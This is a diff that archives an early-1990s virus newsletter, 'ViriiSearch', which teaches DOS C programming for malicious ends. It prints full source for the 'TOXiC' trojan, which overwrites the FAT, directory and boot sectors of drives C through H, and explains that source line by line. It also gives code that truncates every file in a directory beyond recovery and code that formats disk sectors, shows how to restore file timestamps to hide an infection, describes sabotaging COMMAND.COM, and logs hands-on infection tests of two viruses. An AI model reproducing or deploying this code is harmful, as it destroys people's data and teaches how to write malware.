Be Deleted, Executed Or + + Read) + +Case 5: Hidden/System/Read Only (Combination Of 3, 4 and 5) + + + +----------------------------------------------------------------------------- + + + +A VERY important part of C language are the curly brackets, { and } + + + +We will now go through the code one more time telling what each { and } is + +for. + + + +I will put a number next to each one, like so: [1] and [2] and [3] etc.. + + + +at the end of the code, I will tell what each one is for. 
+ + + +----------------------------------------------------------------------------- + + + +#include + +#include + +int count1=0,loop=0; + + + +main(argc,argv) + +int argc; + +char *argv[]; + +{ [1] + +if (argc != 2) { [2] + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + } [3] + +else { [4] + +struct find_t all_file; + + while (loop!=4) { [5] + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { [6] + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } [7] + + else { [8] + + printf("1. Normal\n"); + + printf("2. Read Only\n"); + + printf("3. Hidden\n"); + + printf("4. System\n"); + + printf("5. Hidden/System/Read Only\n\n"); + + printf("Enter Your Choice: "); + +switch(getch()) { [9] + + case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { [10] + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } [11] + + printf("\n%d Files.\n", count1); + + break; + + case '2': loop=4; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("\n\nFile: %s successfully changed to: READ ONLY.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { [12] + + count1++; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("File: %s successfully changed to: READ ONLY.\n", all_file.name); + + } [13] + + printf("\n%d Files.\n", count1); + + break; + + case '3': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + count1++; + + printf("\n\nFile: %s successfully changed to: HIDDEN.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { [14] + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + printf("File: %s successfully changed to: HIDDEN.\n", 
all_file.name); + + } [15] + + printf("\n%d Files.\n", count1); + + break; + + case '4': loop=4; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + count1++; + + printf("\n\nFile: %s successfully changed to: SYSTEM.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { [16] + + count1++; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + printf("File: %s successfully changed to: SYSTEM.\n", all_file.name); + + } [17] + + printf("\n%d Files.\n", count1); + + break; + + case '5': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + count1++; + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { [18] + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + } [19] + + printf("\n%d Files.\n", count1); + + break; + + default: loop=5; + + printf("\n\nThat was not a valid menu selection.\n\n"); + + printf("Please try again:\n\n"); + + break; + + } [20] + + } [21] + + } [22] + + } [23] + +} [24] + + + +----------------------------------------------------------------------------- + + + +For every { there has to be a } + + + +Groups of code, such as particular functions, while loops, switch statements, + +and the main body of the program are enclosed in between { and } + + + +----------------------------------------------------------------------------- + + + +Pairs: What The Are For: + +----------------------------------------------------------------------------- + +[1] [24] Enclose The Main Body Of The Program + + + +[2] [3] Enclose The Body Of Code To Execute If argc Doesn't Equal 2 + + + +[4] [21] Enclose The Body Of Code To Execute If argc Does Equal 2 + + + +[5] [22] Enclose The Body Of Code To Execute Until loop Doesn't Equal 4 + + + +[6] [7] Enclose The Body Of Code To Execute If _dos_findfirst Doesn't + + Find A Matching File + 
+ + +[8] [23] Enclose The Body Of Code To Execute If _dos_findfirst Does + + Find A Matching File + + + +[9] [20] For The Switch Statement Beginning And Ending + + + +[10] [11] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '1') + + + +[12] [13] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '2') + + + +[14] [15] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '3') + + + +[16] [17] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '4') + + + +[18] [19] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '5') + + + +----------------------------------------------------------------------------- + + + +By Now I Am Sure You Can See The Importance Of Curly Brackets And Where You + +Place Them In Your Code. I Recall Someone Thinking They Were A Awesome + +Programmer Because They Knew A Few Nice Third Party Commercial C Libraries, + +But The Didn't Know The Language Too Well, And As A Result, He Was Not The + +Great Programmer He Thought He Was. 
+ + + +----------------------------------------------------------------------------- + + + +Writing/Reading The File Allocation Table: + + + +----------------------------------------------------------------------------- + + + +#include + +int main (void); + +main() + +{ + + struct diskinfo_t disk_info; + + + + disk_info.drive=2; /* 0 = Drive A, 1 = Drive B, 2 = Drive C */ + + disk_info.head=0; /* disk drive head */ + + disk_info.track=0; /* track to read from */ + + disk_info.sector=1; /* Starting Sector */ + + disk_info.nsectors=10; /* Number Of Sectors To Read */ + + + + _bios_disk(_DISK_READ,&disk_info); + +} + + + +----------------------------------------------------------------------------- + + + +The Above Code Will Read 10 Sectors Starting At Sector 1 On Track 0, Side 0 + +Of Drive C. + + + +The _bios_disk function makes use of the "diskinfo_t" structure in "BIOS.H" + + + +The diskinfo_t structure: + + + + struct diskinfo_t { + + unsigned drive; + + unsigned head; + + unsigned track; + + unsigned sector; + + unsigned nsectors; + + void far *buffer; + + }; + + + +----------------------------------------------------------------------------- + + + +If you wanted to write to the disk rather than read from it, replace this + +line: + + + +_bios_disk(_DISK_READ,&disk_info); + + + +With this: + + + +_bios_disk(_DISK_WRITE,&disk_info); + + + +_DISK_READ and _DISK_WRITE are known as 'Manifest Constants' They tell the + +_bios_disk function whether to read or write... + + + +Starting sector and number of sectors will vary depending on the media you + +want to read from or write to the file allocation table (FAT) on. 
+ + + +----------------------------------------------------------------------------- + + + +Truncating Files To 0 Bytes: + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +int main (void); + +main() + +{ + + int fh; + + struct find_t find_all; + + + + _dos_findfirst("*.*",_A_NORMAL|_A_RDONLY|_A_HIDDEN|_A_SYSTEM,&find_all); + + _dos_setfileattr(find_all.name,_A_NORMAL); + + fh=open(find_all.name,O_TRUNC); + + close(fh); + + while (_dos_findnext(&all_file) == 0) { + + _dos_setfileattr(find_all.name,_A_NORMAL); + + fh=open(find_all.name,O_TRUNC); + + close(fh); + + } + +} + + + +----------------------------------------------------------------------------- + + + +We've Already Covered _dos_findfirst, _dos_findnext, _dos_setfileattr And + +Structures So We Will Concentrate On The "open" And "close" Functions, Which + +Are Relatively Simple. + + + + + +The Following Line Opens "find_all.name" And The Manifest Constant "O_TRUNC" + +Passed To The "open" Function Causes The File Being Opened To Be Truncated + +To 0 Bytes. + + + + fh=open(find_all.name,O_TRUNC); + + + +And Then We Close The Open Handle, Which Was Passed To The Integer "fh" By + +The "open" Function. + + + + close(fh); + + + + + +When We Close The File, It Gets Written Back To The Disk In The Same Exact + +Spot, But With It's Contents Destroyed. UNERASE (C) Symantec And Similar + +"File Recovery" Utilities Cannot Recover The Files. The Only Drawback To This + +Method Is That It Is Awfully Slow. 
+ + + +----------------------------------------------------------------------------- + + + +Saving/Restoring File Dates/Times: + + + +----------------------------------------------------------------------------- + + + +Below is a C program to change the date and time stamp on a file called + +"TEST.TXT" to 01/01/82 and 1:32am + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh=0; + +unsigned date=0x421; + +unsigned time=0xC0F; + +int main(void); + +main() + +{ + + _dos_open("TEST.TXT",O_RDONLY,&fh); + + _dos_setftime(fh,date,time); + + _dos_close(fh); + +} + + + +----------------------------------------------------------------------------- + + + +_dos_open is passed three parameters, the file, the mode to open the file + +with, and a integer. + + + +The file is self explanatory, the mode is O_RDONLY which is read only. It is + +not neccesarry to open the file in a writable mode since we won't actually be + +writing to the file. The filename is passed to the integer "fh" + + + +The next function, _dos_setftime, is passed the integer, "fh", and the date + +and time to set on the file. date and time are unsigned integers. date has + +the hexadecimal value, 0x421, which is: 01/01/82 and time has the hexadecimal + +value, 0xC0F, which is 1:32am. This function sets the specified date and time + +and then the integer "fh" is passed to the _dos_close function, which closes + +the file. 
+ + + +----------------------------------------------------------------------------- + + + +We can preserve the original date and time stamp on a file by using the + +function called "_dos_getftime" + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh; + +unsigned date; + +unsigned time; + +int main(void); + +main() + +{ + + _dos_open("TEST.TXT",O_RDONLY,&fh); + + _dos_getftime(fh,&date,&time); + + _dos_close(fh); + +} + + + +----------------------------------------------------------------------------- + + + +This program is virtually identical to the previous one except that we use + +_dos_getftime in place of _dos_setftime. + + + +----------------------------------------------------------------------------- + + + +If you were wondering where to get the hexadecimal values for setting the + +date and time, you can do it this way: + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh; + +char filename[13] = {"*.*"}; + +FILE *stream; + +unsigned date; + +unsigned mtime; + +int main(void); + +main() + +{ + +struct stat buf; + +struct find_t all_file; + + + +stream=fopen("HEXTABLE.TXT","a"); + +_dos_findfirst(filename, _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file); + +_dos_open(all_file.name,O_RDONLY,&fh); + +_dos_getftime(fh,&date,&mtime); + +fstat(fh,&buf); + +_dos_close(fh); + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," Hexadecimal:\t\t| Regular:\n"); + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + +while (_dos_findnext(&all_file) == 0) { + + _dos_open(all_file.name,O_RDONLY,&fh); + + 
_dos_getftime(fh,&date,&mtime); + + fstat(fh,&buf); + + _dos_close(fh); + + fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + + } + + fclose(stream); + +} + + + +----------------------------------------------------------------------------- + + + +This is actually very simple. It uses the file finding methods used in ATTRB + +v3.0, discussed earlier, with one difference: It doesn't take a command line + +parameter like ATTRB did...instead the filespec is declared in the code as a + +character array: + + + +char filename[13] = {"*.*"}; + + + +In this case, it finds ALL the files, using wildcards. You can change it to + +find any file(s) you want, for instance: + + + +char filename[13] = {"*.COM"}; + + + +Would find all the files that have a extension of .COM + + + +The curly braces { and } surrounding the filespec are neccessary when + +initializing a array. + + + +This is the structure for returning the date and time on the file: + + + +struct stat buf; + + + +And this is the structure for finding the files: + + + +struct find_t all_file; + + + +Here it opens the "HEXTABLE.TXT" file. Note the "a" switch, which means + +"append" if the file exists, it will write to the end of the file. If it + +doesn't exist, it will create it. + + + +stream=fopen("HEXTABLE.TXT","a"); + + + +Here it starts the search. 
It attempts to locate the first file matching: + + + +char filename[13] = {"*.*"}; + + + +and passes the filename found to the "all_file" structure + + + +_dos_findfirst(filename, _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file); + + + +Here _dos_open opens the file, and passes the file handle to the integer "fh" + + + +_dos_open(all_file.name,O_RDONLY,&fh); + + + +And here it gets the file date and time, storing it in the two unsigned + +integers "date" and "mtime" + + + +NOTE: I originall called had used "time" instead of "mtime" and it wouldn't + +compile and link the file because "time" is a function in the standard + +library that came with the compiler. Told ya I'm still learning! + + + +BTW, the screw up with 'time' was Microsoft's fault. That's what they used in + +the manual. + + + +_dos_getftime(fh,&date,&mtime); + + + +Here it gets the stats on the file as outlined in the stat structure. + + + +fstat(fh,&buf); + + + +Then it close the file that the integer "fh" points to. + + + +_dos_close(fh); + + + +and prints the following lines to the file "HEXTABLE.TXT" + + + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," Hexadecimal:\t\t| Regular:\n"); + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + + + +\t is a TAB, %s is a string, and %x is a hexadecimal value. + + + +It prints date and mtime as hex values, and prints the regular date and time + +as a string with the help of the "ctime" function. 
+ + + +And the following code basically does the same thing until there are no more + +files matching "all_file.name" + + + +while (_dos_findnext(&all_file) == 0) { + + _dos_open(all_file.name,O_RDONLY,&fh); + + _dos_getftime(fh,&date,&mtime); + + fstat(fh,&buf); + + _dos_close(fh); + + fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + + } + + + +then it close "HEXTABLE.TXT" and exits. + + + + fclose(stream); + +} + + + +***************************************************************************** + + + +Following is part of "HEXTABLE.TXT" after I ran the above program so you can + +see some examples of hexadecimal date and time values and the regular date + +and time next to them: + + + +NOTE: The first hexadecimal value is the date, the second one is the time. + + + +***************************************************************************** + + + +----------------------------------------------------------------------------- + + Hexadecimal: | Regular: + +----------------------------------------------------------------------------- + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1896 4bd1 | Wed Apr 22 09:30:34 1992 + + 106a 5a2c | Thu Mar 10 11:17:24 1988 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1689 2800 | Tue Apr 09 05:00:00 1991 + + 1896 4a5c | Wed Apr 22 09:18:56 1992 + + 1896 4a5c | Wed Apr 22 09:18:56 1992 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + + +***************************************************************************** + + + +You will notice in the previous program that set the file date and time, I + +had it like this: + + + +unsigned date=0x421; + +unsigned time=0xC0F; + + + +Now, in the above hex values, 1067 is 03/07/88 and 2820 is 5:01am, so you + +would put: + + + +unsigned date=1067; + +unsigned time=2820; + + + +right? WRONG. 
You have to put the 0x in front of it: + + + +unsigned date=0x1067; + +unsigned time=0x2820; + + + +This is only required if you are going to declare and initialize two integers + +with a value such as I did here: + +----------------------------------------------------------------------------- + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh=0; + +unsigned date=0x421; + +unsigned time=0xC0F; + +int main(void); + +main() + +{ + + _dos_open("TEST.TXT",O_RDONLY,&fh); + + _dos_setftime(fh,date,time); + + _dos_close(fh); + +} + +----------------------------------------------------------------------------- + +However, when getting the time and date using _dos_getftime and setting it + +using _dos_setftime, the 0x is not neccessary even though _dos_getftime does + +return the values without the 0x because _dos_setftime knows what they are + +and does set the date and time according to what the two values are. + +----------------------------------------------------------------------------- + + + +Now, the final product on getting/setting file dates/times: + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh; + +int main (void); + +main() + +{ + +unsigned date; + +unsigned mtime; + +_dos_open("EXAMPLE.EXE",O_RDWR,&fh); /* open file */ + +_dos_getftime(fh,&date,&mtime); /* get file date and time */ + +/* Virus can infect "EXAMPLE.EXE" here */ + +/* and then restore the original date and time */ + +_dos_setftime(fh,date,mtime); + +_dos_close(fh); /* close "EXAMPLE.EXE" */ + +} + + + +----------------------------------------------------------------------------- + + + +Formatting: + + + +----------------------------------------------------------------------------- + + + +#include + +int main(void); + +main() + +{ + + struct diskinfo_t disk_info; + + + + disk_info.drive =2; + + disk_info.head =1; + + 
disk_info.track =1; + + disk_info.sector =1; + + disk_info.nsectors =10; + + + + _bios_disk(_DISK_FORMAT,&disk_info); + +} + + + +----------------------------------------------------------------------------- + + + +The above example will format 10 sectors of track 1, starting at sector 1 on + +head 1 of drive C. + + + +----------------------------------------------------------------------------- + + + + disk_info.drive =2; + + disk_info.head =1; + + disk_info.track =1; + + disk_info.sector =1; + + disk_info.nsectors =10; + + + +----------------------------------------------------------------------------- + +disk_info.drive=2 is drive C. + + + +0 is drive A, and 1 is drive B. + + + +disk_info.head=1 is head 1. + + + +disk_info.track=1 is the track to start formatting at. + + + +disk_info.sector=1 is the sector to start formatting at. + + + +disk_info.nsectors=10 is the total number of sectors to format. + +----------------------------------------------------------------------------- + + + +Fun with COMMAND.COM + + + +----------------------------------------------------------------------------- + + + +OK, I did this to a friend of mine, and it resulted in about two hours of + +major frustration before I finally called him and told him what I did. What + +we do is change all the internal MS-DOS commands inside COMMAND.COM...once + +you do that, replace someone's COMMAND.COM on their hard drive and re-boot + +their machine. What will happen is whenever they type a internal command such + +as CLS, COPY, MD, DIR, etc, it will say: Bad Command Or Filename. + + + +This is how it is done: + + + +Run a sector editor such as: Norton Utilitie's DISKEDIT + + + +Commands: + + + +Alt (O)bject and then (F)ile OR Alt-F by itself. Then select COMMAND.COM as + +the file, it will then open it. Then: Alt (T)ools, (F)ind OR CTRL-S. 
Then type + +in the string to search for (CLS, DIR, COPY, etc), once it finds it, do the + +following: + + + +Alt (E)dit, (M)ark OR CTRL-B + + + +Then simply type over the command with something else and hit CTRL-W which + +will write those changes to the file. + + + +Just do this with every internal command and there you go. + + + +Note: If there is a string of text in COMMAND.COM such as: "Copy is used to + +move files from drive to drive or directory to directory", when you search + +for COPY it will find the Copy at the beginning of that string, you don't want + +to change that. Just hit CTRL-G (Find again) to find the next occurence of + +COPY.....The one you are looking for will be in all CAPS and surrounded by + +nothing else but unreadable characters. + + + +----------------------------------------------------------------------------- + + + +Sample Source Code Of Virii: TOXiC Trojan #1 + + + +----------------------------------------------------------------------------- + + + +This is what the author of the "TOXiC Trojan #1" has to say about his + +creation: + + + +----------------------------------------------------------------------------- + +TOXiC1 - TOXiC Trojan #1 - Programmed by Izzy Stradlin' and MiSERY/CPA + + MiSERY1 is the name given to this trojan. I programmed it, I name the + + Mother fucker. I hereby give all rights of this trojan to MiSERY/CPA. + + If ya don't like it, TOUGH. I Give ALL rights EXCEPT for the NAME to + + CPA - eg. NOONE CAN CHANGE THE NAME OF THIS THING W/O MY PERMISSION AND + + LEAVE MY NAME IN IT. The name must stay on, both my name and the name + + of the trojan are copyrighted (c) 90 to Izzy Stradlin' + + ----------------------------------------------------------------------- + + Capt. - This isn't a Real Virus - It's a Trojan. Sorry, still trying + + to use something similar to ASM's int 21h; for DOSs features, then I'll + + Get going on Virii. 
As is, this Destroys Boot/Fat/Dir on Most harddisks + + and Well, there is so far no way that I know of that it can recover + + what the disk lost, as it writes the trojan name over everything. This + + SHOULD Go for BOTH FAT Tables, but I am not going to try it out. Haha. + + You try it - Tell me how it works! all I know is that it got 6 of my + + Flippin' floppies, damnit! - Delete this bottom message to you after + + Checking it out - Makes it look more professional. Leave the top text + + part in tact, just in case you want to pass it around. + + This is JUST A START. They DO/WILL Get better - this is weak, but as I + + Said - no known recovery from it. + + Oh, this looks for C: through H: + + + +----------------------------------------------------------------------------- + + + +And this is what I have to say about The "TOXiC Trojan #1" + + + +----------------------------------------------------------------------------- + + + +The author of the "TOXiC Trojan #1" says that this is a trojan, but to me it + +is NOT....if it was, it wouldn't be featured here as this is a newsletter + +dedicated entirely to virii. A trojan is a destructive program disguised as + +a real program that already exists, or disguised as a useful program. This + +program does not implement any encryption techniques, or stealth techniques + +so actually it is a toss up. I call it a virus, though. Anyway, the source + +code below is the original source code as written by Izzy Stradlin' + + + +----------------------------------------------------------------------------- + + + +#define TROJAN_NAME "TOXiC" /* Trojan Name */ + + + +/* Procedures */ + +void infect_fat(); + +void infect_dir(); + +void infect_boot(); + +void main(); + +/* Simple, eh? 
*/ + + + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +void infect_dir() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,2,2,TROJAN_NAME); + + } + +} + + + +void infect_boot() + +{ + + int i; + + for (i=0; i<7; i++) { + + abswrite(i,4,2,TROJAN_NAME); + + } + +} + + + +void main() + +{ + + printf(TROJAN_NAME); + + infect_fat(); + + infect_dir(); + + infect_boot(); + +} + + + +----------------------------------------------------------------------------- + + + +Now, this is my modified source code to the "TOXiC Trojan #1" + + + +----------------------------------------------------------------------------- + + + +#define TROJAN_NAME "TOXiC" + +void infect_fat(); + +void infect_dir(); + +void infect_boot(); + +int main(void); + +main() + +{ + + printf(TROJAN_NAME); + + infect_fat(); + + infect_dir(); + + infect_boot(); + +} + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +void infect_dir() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,2,2,TROJAN_NAME); + + } + +} + + + +void infect_boot() + +{ + + int i; + + for (i=0; i<7; i++) { + + abswrite(i,4,2,TROJAN_NAME); + + } + +} + + + +----------------------------------------------------------------------------- + + + +You may ask why I modified his source code, well I did for a few reasons: + + + +He declared "main()" as: + + + +void main(); + + + +When I first became familiar with the ANSI C standard, I declared "main()" + +like so: + + + +int main(void); + + + +which says that main() will return a value of type int but has no parameters + +passed to it. His way says that main will not return a value at all, and (I + +am assuming here) will not be called with any parameters because he left the + +parentheses empty. Using void and leaving the parentheses empty may very well + +have the same effect, although I am not sure. 
(I never said I knew everything) + + + +In his he put his procedures (below) before the main program. + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +void infect_dir() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,2,2,TROJAN_NAME); + + } + +} + + + +void infect_boot() + +{ + + int i; + + for (i=0; i<7; i++) { + + abswrite(i,4,2,TROJAN_NAME); + + } + +} + + + +With mine, I placed the procedures after the main program. Once again I am + +not 100% sure that this would have any effect on your program, and whether or + +not it is a case of preference. + + + +His three procedures: + + + +infect_fat() + +infect_dir() + +infect_boot() + + + +are all declared to return no value (void) and called with no parameters, as + +he, once again, left the parentheses empty. (Which brings us back to main().. + +leaving the parentheses empty on main() must have the same effect as putting + +void in the parentheses) + + + +Now the discussion of his procedures: + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +This procedure, "infect_fat" writes the name of the trojan (virus) over + +the file allocation table of drives C through H, providing they exist. This + +is how it works: + + + +the "for loop" uses the integer i, first assigning the value 2 to it, which + +is the number of drive C, and then it passes the integer to the function + +"abswrite" along with two other values, 0 and 2, and the name of the virus. + + + +The integer i, as we know, contains the drive number, 0 is the starting sector + +number, and 2 is the number of sectors to write. TROJAN_NAME is what gets + +written to that area of the disk. Every time it passes through the for loop, + +it increments the value of the integer i by 1 with the 'increment operator' + +(i++) and it stops once the value of i is equal to or greater than 7. 
i<7 is + +basically saying "while i is less than 7, keep going" Because the value of i + +is increased with each pass through the loop, it attempts to write drives C + +through H (2 being drive C, 3 being drive D, 4 being drive E, etc) + + + +The code in between the first { and the second } is what the procedure does. + +The code in between the second { and the first } is what takes place every + +time the procedure passes through the for loop. + + + +The other two procedures, infect_dir() and infect_boot(), basically work the + +same way infect_fat() does except they write to a different part of the disk. + + + +infect_dir() writes TROJAN_NAME on two sectors of drives C through H starting + +at sector 2. + + + +infect_boot() writes TROJAN_NAME on two sectors of drives C through H starting + +at sector 4. + + + +NOTE: abswrite() is not a function included with my standard runtime library + +but may be a part of other compiler's runtime libraries, or you could write + +one yourself. + + + +----------------------------------------------------------------------------- + + + +Suicidal Tendencies Dept: + + + +The virus of the month award goes to: 666-B Rock Steady Virus And The 15th + +Of April Virus. + + + +----------------------------------------------------------------------------- + + + +First I will start off with the 666-B Rock Steady Virus. + + + +The virus activates on the 13th of every month. + + + +I placed the file 666-B.COM on a floppy in drive B with the following files: + + + +COMMAND.COM - 47845 bytes + +PKUNZIP.EXE - 23528 bytes + + + +First I changed the system date to: 05-13-1992 and ran 666-B.COM + + + +It didn't do anything to the disk/files of drive B, instead it went to drive + +A which was a write protected Viriisearch disk. 
It gave me the following + +warning: + + + + This disk is not bootable + + + + If you wish to make it bootable, + + run the DOS program SYS after the + + system has been loaded + + + + Please insert a DOS diskette into + + the drive and strike any key... + + + +So I inserted a write protected DOS disk into the drive, and the machine + +booted. I decided to try a different approach: + + + +I once again changed the system date to: 05-13-1992 and once again ran + +666-B.COM, but this time with a write protected DOS disk in drive A. It did + +the same thing again, ignored drive B, and went right for drive A, this time + +appearing to write to the disk for about 5-10 seconds, but it wasn't because + +the disk was write protected at the time. Then the machine re-booted. So again + +I tried another approach: + + + +I left the system date as what it was: 1-01-80 and then ran 666-B.COM, it did + +nothing but exit. Then I ran COMMAND.COM from the command line, no changes + +were made to it. Now, with the virus in memory, I again changed the system + +date to: 05-13-1992 and ran COMMAND.COM from the command line. This time it + +infected COMMAND.COM, increasing it's size to: 48511 bytes from 47845 bytes. + +I re-booted the machine, and looked back on drive B. PKUNZIP.EXE had also + +been infected without me running it, it's size being increased to 24194 bytes + +from 23528 bytes. + + + +Note: The virus also formats the hard drive Boot Area and FAT on the 13th of + + every month, but I do not have a hard drive so I did not witness this. + + This is a well written virus and I am sure it does that if Rock Steady + + says it does. + + + +----------------------------------------------------------------------------- + + + +Suicidal Tendencies Dept. 
Part II: The 15th Of April Virus + + + +----------------------------------------------------------------------------- + + + +I placed the following files on a floppy in drive B: + + + + + +ANSI SYS 9029 04-09-91 5:00a + +RAMDRIVE SYS 5873 04-09-91 5:00a + +CONFIG SYS 39 01-01-80 12:35a + +COMMAND COM 47845 04-09-91 5:00a + +SYS COM 13440 04-09-91 5:00a + +NDOS COM 2419 08-14-84 12:00p + +MEM EXE 39818 04-09-91 5:00a + +DEBUG EXE 21692 06-07-90 2:24a + +PKUNZIP EXE 23528 03-15-90 1:10a + + + +and then placed 15APR.COM on there with them. + + + +The system date was: 1-01-80 when I first ran 15APR.COM. + + + +I then ran MEM.EXE and it's size increased to 41068 bytes from 39818 bytes. + +I also ran PKUNZIP.EXE, it's size increased to 24778 bytes from 23528 bytes, + +and NDOS.COM, it's size increasing from 2419 bytes to 3669 bytes. + + + +I then changed the system date to the 15th Of April, 1992 and ran 15APR.COM + +once again, and it did nothing. + + + +I ran COMMAND.COM and the virus did nothing to it, it remained uninfected and + +it's size remained the same so I ran SYS.COM with no parameters and it did + +get infected, it's size increasing from 13440 bytes to 14690 bytes. + + + +In all cases of a file being infected, it's size increased by 1250 bytes. + + + +----------------------------------------------------------------------------- + + + +Final Notes: + + + +----------------------------------------------------------------------------- + + + +Special thanks to: + + + +----------------------------------------------------------------------------- + + + +Rock Steady - For Writing Such A Well Written Virus For Me To Screw Around + + With. + + + +All The Phalcon/Skism Members - For Letting Me On U.S.S.R. And Letting Me + + Take Dark Angel's Phunky Virus Writing + + Guide As Well As 40 HEX (Gotta Love It + + When You Guys Rag On The Anti-Viral PPL) + + + +Louis Cypher - For Letting Me On Lucid Dreams, And Doing Me That Favor. 
+ + + +Cliff Burton - For Making TLITD The Viriisearch HQ. + + + +Patty, Mr. Dickburg, And Whoever Else - For Giving The Phalcon/Skism Guys + + Someone To Rag On. + + + +Count Zero And Magic Man: For Letting Me On ATDT Which Led To My Original + + Interest In Virii. + + + +Spaceman: For Making All Those Virii Available To Me. + + + +To All The Virus Authors - For Writing Them And Giving This Newsletter A + + Purpose, And Giving Me Something To Do While + + A Unemployment Victim Of This #$%*& Recession. + + + +Pink Floyd/Led Zeppelin/Rush/U2/Queen - For Giving Me Good Quality Music To + + Listen To While Writing This Virus + + Newsletter (R.I.P Freddy & Bonzo) + + + +And Hi To Darby Crash! Hope You're Doing Well Wherever You Are! + + + +----------------------------------------------------------------------------- + + + +Hey Everyone: Have a AWESOME 4th Of July! Don't Drink And Drive (At Least Not + +In MY Neighborhood!) + + + +I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated + +entirely to computer virii. + + + + + +Until Next Time......Be Careful!!! + + + + * Criminal Minded * + + + +----------------------------------------------------------------------------- + + + +Downloaded From P-80 International Information Systems 304-744-2253 + diff --git a/textfiles.com/virus/cmvs-3.v1 b/textfiles.com/virus/cmvs-3.v1 new file mode 100644 index 00000000..f1193cc4 --- /dev/null +++ b/textfiles.com/virus/cmvs-3.v1 
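Review bot: every `#include` directive in the C listings archived by this hunk has lost its header name, for example the bare `#include` immediately before `int main (void);` in the `_bios_disk` example and the seven consecutive bare `#include` lines ahead of the `_dos_setftime` example; that pattern is what angle-bracket names such as `<bios.h>` look like after being stripped as markup on import, so the added file should be compared byte-for-byte with the upstream textfiles.com copy and re-added verbatim if the originals carried the names, since the archive is only useful when the text is faithful. The `Downloaded From P-80 International Information Systems 304-744-2253` trailer is part of the original file and should stay.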
@@ -0,0 +1,1216 @@ +DISCLAIMER: +The author will NOT accept responsibility for any damage to your +computer media and/or files, or responsibility for any action you might +take that will result in legal proceedings, the source code, if any, in +this newsletter is THE REAL THING, and you, after you read this, will be +well aware of what virii are capable of, and knowing that, it is expected +that you will act responsibly. + +DISCLAIMER II: +All I know about programming I have learned on my own, and did not go to +school for, and am still learning. As a result, I am sometimes prone to +make mistakes, and be wrong about things, so please be patient if I should +make a mistake, or say something that isn't true, which would be totally +unintentional. + + + ViriiSearch + ----------- + + The Virus Research Newsletter + + Volume 1, Number 3 + + Date: 08/02/92 + +CREDITS: +----------------------------------------------------------------------------- +Author...................................................Criminal Minded +Editor...................................................Criminal Minded +Ideas, Source, Examples Supplied By......................Criminal Minded +Facts Stolen From Several Sources By.....................Criminal Minded +----------------------------------------------------------------------------- + +Introduction: + +Welcome To The Third Issue Of 